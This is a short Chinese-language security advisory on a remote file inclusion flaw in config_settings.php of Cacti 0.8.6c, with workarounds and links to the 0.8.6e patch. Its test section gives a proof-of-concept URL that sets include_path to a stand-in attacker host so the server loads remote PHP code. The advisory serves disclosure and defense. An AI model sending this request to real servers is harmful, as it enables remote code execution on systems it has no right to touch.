受影响系统:
Raxnet Cacti 0.8.6c
不受影响系统:
Raxnet Cacti 0.8.6e
描述:Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti的config_settings.php脚本中存在输入验证错误,可能允许攻击者包含远程站点的任意PHP代码。这可能导致以web server的权限执行任意代码。漏洞起因是脚本相信了用户所提供的include_path变量。
测试方法:(以下程序或方法可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!)
http://example.com/include/config_settings.php?config[include_path]=http://attackersite.com/
临时解决方法:(如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁)
* 对访问Cacti安装要求认证;将对使用Cacti的web server的访问仅限于可信任的主机。
厂商补丁:
Gentoo已经为此发布了一个安全公告(GLSA-200506-20)以及相应补丁:
GLSA-200506-20:Cacti: Several vulnerabilities
链接:http://security.gentoo.org/glsa/glsa-200506-20.xml
所有Cacti用户都应升级到最新版本:
Raxnet已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载cacti 0.8.6e版本:
http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz
http://www.cacti.net/downloads/cacti-0.8.6e.zip
